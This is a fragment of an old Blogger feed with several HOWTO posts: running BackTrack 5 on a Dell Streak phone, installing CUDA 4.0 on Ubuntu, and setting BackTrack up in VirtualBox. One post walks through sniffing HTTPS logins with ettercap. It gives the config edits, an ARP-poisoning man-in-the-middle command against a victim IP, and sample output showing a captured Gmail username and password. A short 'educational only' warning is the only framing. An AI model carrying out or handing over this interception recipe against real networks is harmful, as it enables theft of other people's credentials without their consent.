(1) &lt;code&gt;Android Terminal Emulator&lt;/code&gt; by Jack Palevich&lt;br /&gt;
(2) &lt;code&gt;Android-VNC-Viewer&lt;/code&gt; by androidVNC team + antlersoft&lt;br /&gt;
Or, (3) &lt;code&gt;Mocha VNC Lite&lt;/code&gt; by MochaSoft&lt;br /&gt;
&lt;br /&gt;
** Step 1 to 4, just do them ONCE.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;PART II - INSTALL BACK|TRACK 5 ON DELL STREAK&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Since the original ARM version of Back|Track 5 cannot be copied to the SD Card due to the size of the image larger than 4GB.  You should download a resized version which is developed by anantshri.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://bit.ly/p1BT5"&gt;bt.7z.001&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://bit.ly/BT5p2"&gt;bt.7z.002&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://bit.ly/BT5p3"&gt;bt.7z.003&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
MD5SUM :&lt;br /&gt;
558ecb1f0e5feb1da86526df8761e6cc bt.7z.001&lt;br /&gt;
247842fd0d3ebb39454f76f4704d1537 bt.7z.002&lt;br /&gt;
f74d2f744434a7182b13287d9f8165e7 bt.7z.003&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 6 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Double click on "&lt;code&gt;bt.7z.001&lt;/code&gt;" to extract.  You will then see the following after the extract.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;bt&lt;br /&gt;
bt.img&lt;br /&gt;
startbt&lt;br /&gt;
stopbt&lt;br /&gt;
installbt.sh&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
You should create a directory of "&lt;code&gt;bt&lt;/code&gt;" (or folder) on the SD Card's root directory.&lt;br /&gt;
&lt;br /&gt;
Copy these files to "&lt;code&gt;/sdcard/bt&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 7 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Run the following commands on the &lt;code&gt;Terminal Emulator&lt;/code&gt; on your Streak.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;su&lt;br /&gt;
cd /sdcard/bt&lt;br /&gt;
sh installbt.sh&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
** This step is just doing ONCE unless your ROM is reflashed or updated.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 8 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Run the following commands on the &lt;code&gt;Terminal Emulator&lt;/code&gt; on your Streak.&lt;br /&gt;
&lt;br /&gt;
To start the Back|Track 5 :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;startbt&lt;br /&gt;
bt&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Then, you will drop to the Back|Track shell&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 9 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Under the Back|Track shell, run the following :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;ui&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
** It will start the VNC server on your Streak.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 10 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Press "&lt;code&gt;Home&lt;/code&gt;" on your Streak and then run the apps "&lt;code&gt;Android-VNC-Viewer&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;Nick : BackTrack (or bt for short)&lt;br /&gt;
Address : localhost&lt;br /&gt;
Port : 5901&lt;br /&gt;
Password : 12345678&lt;br /&gt;
Color Format : 24-bit color (4 bpp)&lt;br /&gt;
Local mouse pointer : Enable&lt;br /&gt;
Force full-screen bitmap : Auto&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Then, press "&lt;code&gt;Connect&lt;/code&gt;".  You will see the Back|Track 5 launched.&lt;br /&gt;
&lt;br /&gt;
** The setting of the Android-VNC-Viewer will be remembered.  That means you just type ONCE.&lt;br /&gt;
&lt;br /&gt;
Press "&lt;code&gt;Home&lt;/code&gt;" to go to the Streak screen.  Back|Track 5 is still running.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 11 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
To stop the Back|Track 5, run the following command on the Back|Track shell :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;killui&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
** Stop the VNC server.&lt;br /&gt;
&lt;br /&gt;
And then, run the following command :&lt;br /&gt;
&lt;br /&gt;
Exit the &lt;code&gt;Terminal Emulator&lt;/code&gt; and then restart it.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;stopbt&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Now, the Back|Track 5 is stopped running.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 12 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
To launch the Back|Track next time, you should repeat the Step 8 to 10.  And stop the Back|Track just repeat Step 11.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;Source :&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://forum.xda-developers.com/wiki/index.php?title=Dell_Streak"&gt;xda developers - Dell Streak&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://forum.xda-developers.com/showthread.php?t=1074169"&gt;BACKTRACK 5 on Xperia X10 chroot&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://theunlockr.com/2010/08/15/how-to-root-the-dell-streak-2/"&gt;HOWTO : Root the Dell Streak (Updated 2010-Dec-13) -- at your own risk&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://forum.xda-developers.com/showthread.php?t=1000455"&gt;Streak - MultiRecoveryFlasher&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://forum.xda-developers.com/attachment.php?attachmentid=593348&amp;d=1305148126"&gt;The method of resize the Back|Track 5 image to 3.3GB&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;Known issues :&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;StreakDroid 2.0.0 -&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
Since Dell Streak will reboot or reset itself on every an hour or 1.5 hours, please install an apps namely "&lt;code&gt;Super Task Killer&lt;/code&gt;" by OPDA Team and make it runs automatically when the Streak start up.  Set it to kill the background apps on every half an hour interval.  That MAY solve the problem as mentioned.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;StreakDroid 1.9.0 -&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
The Android keyboard is malfunction but use Swype instead.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;Remarks :&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
(1) Make sure you run "&lt;code&gt;killui&lt;/code&gt;" and "&lt;code&gt;stopbt&lt;/code&gt;" when BackTrack 5 is not required.  &lt;br /&gt;
&lt;br /&gt;
(2) The aircrack-ng cannot be ran properly as the interface is eth0 instead of wlan0.  No monitor mode and no injection.&lt;br /&gt;
&lt;br /&gt;
(3) &lt;a href="http://www.secmaniac.com/may-2011/backtrack-5-on-motorola-xoom-in-10-minutes-or-less/"&gt;SecManiac.com&lt;/a&gt; stated that an apps namely "&lt;code&gt;ASTRO file manager&lt;/code&gt;" can extract the BackTrack 5 ARM image to the SD card that in fat32 format flawlessly.  However, it does not test by me.&lt;br /&gt;
&lt;br /&gt;
(4) Download &lt;code&gt;MultiRecoveryFlasher&lt;/code&gt; at the Source above.  Then, flash "&lt;code&gt;StreakMod-Recovery&lt;/code&gt;" if you cannot flash the StreakDroid.  Under Ubuntu, you are not required to install any driver but you need to run the program in root.  Go to root by the following command :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo -sH&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-859097731672781779?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/859097731672781779'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/859097731672781779'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/06/howto-backtrack-5-on-dell-streak-5.html' title='HOWTO : Back|Track 5 on Dell Streak 5'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-627803464356805040</id><published>2011-05-29T23:29:00.000+08:00</published><updated>2011-05-29T23:29:54.245+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='CUDA'/><category scheme='http://www.blogger.com/atom/ns#' term='nVidia'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>HOWTO : nVidia CUDA Toolkit 4.0 on Ubuntu 11.04 Server</title><content type='html'>The CUDA Toolkit 4.0 is released on May 2011.  If you have nVidia display card that have several CUDAs on it, you will interested in this tutorial. This time, I would like to show you how to install CUDA Toolkit 4.0 on Ubuntu 11.04 Server.&lt;br /&gt;
&lt;br /&gt;
You will experience a more faster server after the installation of CUDA Toolkit 4.0. &lt;br /&gt;
&lt;br /&gt;
This HOWTO does not require to install X.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Add the CUDA 4.0 PPA.&lt;br /&gt;
&lt;code&gt;sudo add-apt-repository ppa:aaron-haviland/cuda-4.0&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Thanks for the developer of CUDA 4.0 PPA - Aaron Haviland of his contribution to make CUDA Toolkit to be installed easily.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get update&lt;br /&gt;
sudo apt-get upgrade&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;64-bit :&lt;/u&gt;&lt;br /&gt;
&lt;code&gt;sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler libnpp4 nvidia-cuda-doc libcudart4 libcublas4 libcufft4 libcusparse4 libcurand4 nvidia-current nvidia-opencl-dev  nvidia-current-dev nvidia-cuda-dev opencl-headers&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;32-bit :&lt;/u&gt;&lt;br /&gt;
&lt;code&gt;sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler lib32npp4 nvidia-cuda-doc lib32cudart4 lib32cublas4 lib32cufft4 lib32cusparse4 lib32curand4 nvidia-current nvidia-opencl-dev nvidia-current-dev nvidia-cuda-dev opencl-headers&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nano /etc/init.d/nvidia_cuda&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Append the following lines.&lt;br /&gt;
&lt;br /&gt;
============= Copy from here ================&lt;br /&gt;
&lt;code&gt;#!/bin/bash&lt;br /&gt;
&lt;br /&gt;
PATH=/sbin:/bin:/usr/bin:$PATH&lt;br /&gt;
&lt;br /&gt;
/sbin/modprobe nvidia&lt;br /&gt;
&lt;br /&gt;
if [ "$?" -eq 0 ]; then&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;# Count the number of NVIDIA controllers found.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;N3D=`/usr/bin/lspci | grep -i NVIDIA | grep "3D controller" | wc -l`&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;NVGA=`/usr/bin/lspci | grep -i NVIDIA | grep "VGA compatible controller" | wc -l`&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;N=`expr $N3D + $NVGA - 1`&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;for i in `seq 0 $N`; do&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;/bin/mknod -m 666 /dev/nvidia$i c 195 $i;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;done&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;/bin/mknod -m 666 /dev/nvidiactl c 195 255&lt;br /&gt;
&lt;br /&gt;
else&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;exit 1&lt;br /&gt;
fi &lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
=========== Copy to here =================&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo chmod +x /etc/init.d/nvidia_cuda&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;sudo update-rc.d nvidia_cuda defaults&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Reboot your system.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Remarks&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
I do not have nVidia display cards server in hand at the moment, I am not sure the captioned startup script working properly or not.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-627803464356805040?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/627803464356805040'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/627803464356805040'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/05/howto-nvidia-cuda-toolkit-40-on-ubuntu_29.html' title='HOWTO : nVidia CUDA Toolkit 4.0 on Ubuntu 11.04 Server'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-1919727009684595258</id><published>2011-05-29T23:24:00.001+08:00</published><updated>2011-06-11T13:53:00.160+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='CUDA'/><category scheme='http://www.blogger.com/atom/ns#' term='nVidia'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>HOWTO : nVidia CUDA Toolkit 4.0 on Ubuntu 11.04 Desktop</title><content type='html'>The CUDA Toolkit 4.0 is released on May 2011.  If you have nVidia display card that have several CUDAs on it, you will interested in this tutorial. This time, I would like to show you how to install CUDA Toolkit 4.0 on Ubuntu 11.04 Desktop.&lt;br /&gt;
&lt;br /&gt;
You will experience a more faster desktop after the installation of CUDA Toolkit 4.0. Meanwhile, if you installed SMPlayer, you can playback 1080p videos with the help of vdpau.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Add the CUDA 4.0 PPA.&lt;br /&gt;
&lt;code&gt;sudo add-apt-repository ppa:aaron-haviland/cuda-4.0&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Thanks for the developer of CUDA 4.0 PPA - Aaron Haviland of his contribution to make CUDA Toolkit to be installed easily.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get update&lt;br /&gt;
sudo apt-get upgrade&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;64-bit :&lt;/u&gt;&lt;br /&gt;
&lt;code&gt;sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler libnpp4 nvidia-cuda-doc libcudart4 libcublas4 libcufft4 libcusparse4 libcurand4 nvidia-current nvidia-opencl-dev  nvidia-current-dev nvidia-cuda-dev opencl-headers&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;32-bit :&lt;/u&gt;&lt;br /&gt;
&lt;code&gt;sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler lib32npp4 nvidia-cuda-doc lib32cudart4 lib32cublas4 lib32cufft4 lib32cusparse4 lib32curand4 nvidia-current nvidia-opencl-dev nvidia-current-dev nvidia-cuda-dev opencl-headers&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2a (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If you do not have any nVidia driver installed before or you encounter any problem of booting up your system, you need to do the following command.  Otherwise, this step is not required at all.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nvidia-xconfig&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
**This step may not be required.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Reboot your system.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
To install SMPlayer.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get install smplayer smplayer-translations smplayer-themes&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Then set it to use "&lt;code&gt;vdpau&lt;/code&gt;" at "&lt;code&gt;Output Driver&lt;/code&gt;" at "&lt;code&gt;Preference&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5 (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Once installed the CUDA Toolkit and nVidia drivers, you can download the sample codes for testing.  &lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get install freeglut3-dev libxi-dev libXmu-dev&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;wget http://developer.download.nvidia.com/compute/cuda/4_0/sdk/gpucomputingsdk_4.0.17_linux.run&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo chmod +x gpucomputingsdk_4.0.17_linux.run&lt;br /&gt;
./gpucomputingsdk_4.0.17_linux.run&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Accept the default settings.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd NVIDIA_GPU_computing_SDK/C&lt;br /&gt;
make&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
** Please ignore the warning messages for unsupported gcc version.  That is no harm at all.&lt;br /&gt;
&lt;br /&gt;
Run the sample codes.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd NVIDIA_GPU_computing_SDK/C/bin/linux/release&lt;br /&gt;
./deviceQuery&lt;br /&gt;
./nbody&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-1919727009684595258?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1919727009684595258'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1919727009684595258'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/05/howto-nvidia-cuda-toolkit-40-on-ubuntu.html' title='HOWTO : nVidia CUDA Toolkit 4.0 on Ubuntu 11.04 Desktop'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-5723990128732054445</id><published>2011-05-28T01:34:00.003+08:00</published><updated>2011-05-29T22:35:16.914+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SSL'/><category scheme='http://www.blogger.com/atom/ns#' term='GMail'/><category scheme='http://www.blogger.com/atom/ns#' term='ettercap'/><category scheme='http://www.blogger.com/atom/ns#' term='Back|Track'/><title type='text'>HOWTO : Sniffing SSL with ettercap on Back|Track 5</title><content type='html'>&lt;code&gt;*** WARNING : This HOWTO is for educational only.  Do NOT carry out the following steps on a LAN that without permission. Otherwise, you will be put into the jail. ***&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Sniffing SSL (https) traffic on LAN with ettercap by mean of Man In The Middle (MITM) attack.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;nano /etc/etter.conf&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Make the change as the following :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;[privs]&lt;br /&gt;
ec_uid = 0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# nobody is the default&lt;br /&gt;
ec_gid = 0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# nobody is the default&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Uncomment the following :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;# if you use iptables:&lt;br /&gt;
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"&lt;br /&gt;
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Victim's machine is at 192.168.1.100 while the router is at 192.168.1.1.  Attacker is at 192.168.1.115.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;ettercap -TqM arp:remote /192.168.1.100/ /192.168.1.1/&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
The outcome of the display is as the following :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;ettercap NG-0.7.3 copyright 2001-2004 ALoR &amp; NaGA&lt;br /&gt;
&lt;br /&gt;
Dissector "dns" not supported (etter.conf line 72)&lt;br /&gt;
Listening on eth0... (Ethernet)&lt;br /&gt;
&lt;br /&gt;
eth0 -&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;08:00:27:FF:95:DB&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;192.168.1.115     255.255.255.0&lt;br /&gt;
&lt;br /&gt;
Privileges dropped to UID 0 GID 0...&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;28 plugins&lt;br /&gt;
&amp;nbsp;&amp;nbsp;39 protocol dissectors&lt;br /&gt;
&amp;nbsp;&amp;nbsp;53 ports monitored&lt;br /&gt;
7587 mac vendor fingerprint&lt;br /&gt;
1698 tcp OS fingerprint&lt;br /&gt;
2183 known services&lt;br /&gt;
&lt;br /&gt;
Scanning for merged targets (2 hosts)...&lt;br /&gt;
&lt;br /&gt;
* |=================================================&gt;| 100.00 %&lt;br /&gt;
&lt;br /&gt;
2 hosts added to the hosts list...&lt;br /&gt;
&lt;br /&gt;
ARP poisoning victims:&lt;br /&gt;
&lt;br /&gt;
GROUP 1 : 192.168.1.100 70:1A:04:FF:0A:9A&lt;br /&gt;
&lt;br /&gt;
GROUP 2 : 192.168.1.1 00:1E:10:FF:A7:E2&lt;br /&gt;
Starting Unified sniffing...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Text only Interface activated...&lt;br /&gt;
Hit 'h' for inline help&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
At the victim's machine, open a browser, such as Firefox and go to GMail.  You will be asked to accept an untrusted certification.  Just accept the certificate and you will be directed to the login screen of GMail.  &lt;br /&gt;
&lt;br /&gt;
When the victim login to the GMail, his/her username and password will be logged on the Attacker's machine.  The display will be similar to the following :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;HTTP : 74.125.71.106:443 -&gt; USER: samiux  PASS: password  INFO: https://www.google.com/accounts/ServiceLogin?service=mail&amp;passive=true&amp;rm=false&amp;continue=http://mail.google.com/mail/?ui=html&amp;zy=l&amp;bsv=llya694le36z&amp;s&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
You will find that USER: samiux and PASS: password.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Remarks :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
To delete the untrusted certificate on Firefox at victim's machine : "&lt;code&gt;Edit&lt;/code&gt;" -- "&lt;code&gt;Perference&lt;/code&gt;" -- "&lt;code&gt;View Certificate List&lt;/code&gt;" -- "&lt;code&gt;Server&lt;/code&gt;".  You will find something like the following.  You just delete them all.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;Thawte Consulting (Pty) Ltd.&lt;br /&gt;
www.google.com www.google.com:443 forever 2011-09-21&lt;br /&gt;
www.google.com mail.google.com:443 forever 2011-09-21&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
In general, GMail will not ask you to accept any certificate, especially untrusted one.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-5723990128732054445?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5723990128732054445'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5723990128732054445'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/05/howto-sniffing-ssl-with-ettercap-on.html' title='HOWTO : Sniffing SSL with ettercap on Back|Track 5'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-8753626046090073069</id><published>2011-05-26T23:57:00.030+08:00</published><updated>2011-09-12T13:13:10.254+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='TP-Link'/><category scheme='http://www.blogger.com/atom/ns#' term='VirtualBox'/><category scheme='http://www.blogger.com/atom/ns#' term='Back|Track'/><title type='text'>HOWTO : Back|Track 5 on VirtualBox 4.0.8</title><content type='html'>&lt;b&gt;(A) Install Back|Track 5 on VirtualBox&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Install VirtualBox 4.0.8 on the host computer, such as Ubuntu 11.04 as usual.  Then install Back|Track 5 on the VirtualBox.  Next is to install Oracle VM VirtualBox Extension Pack and Guest Additons.&lt;br /&gt;
&lt;br /&gt;
Oracle VM VirtualBox Extension Pack is installed on the host computer, such as Ubuntu 11.04.  You can find it on the Download page.&lt;br /&gt;
&lt;br /&gt;
To install Guest Additons, just click "&lt;code&gt;Devices&lt;/code&gt;" -- "&lt;code&gt;Install Guest Additions&lt;/code&gt;" on the menu.&lt;br /&gt;
&lt;br /&gt;
Do the following on the guest computer (Back|Track 5) :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd /media/VBOXADDITONS_4.0.8_71778&lt;br /&gt;
./VBoxLinuxAddtions.run&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
To fix the boot up screen.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;fix-splash&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Do the following on the host computer (Ubuntu 11.04) :&lt;br /&gt;
&lt;br /&gt;
Add you (username) to the group of &lt;code&gt;vboxusers&lt;/code&gt;, e.g. samiux as username.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;useradd -G vboxusers samiux&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Go to "&lt;code&gt;Users and Groups&lt;/code&gt;", "&lt;code&gt;Advanced Settings&lt;/code&gt;" -- "&lt;code&gt;User's Rights&lt;/code&gt;" select "&lt;code&gt;Use VirtualBox solution&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
Then, reboot your host to make it effective.&lt;br /&gt;
&lt;br /&gt;
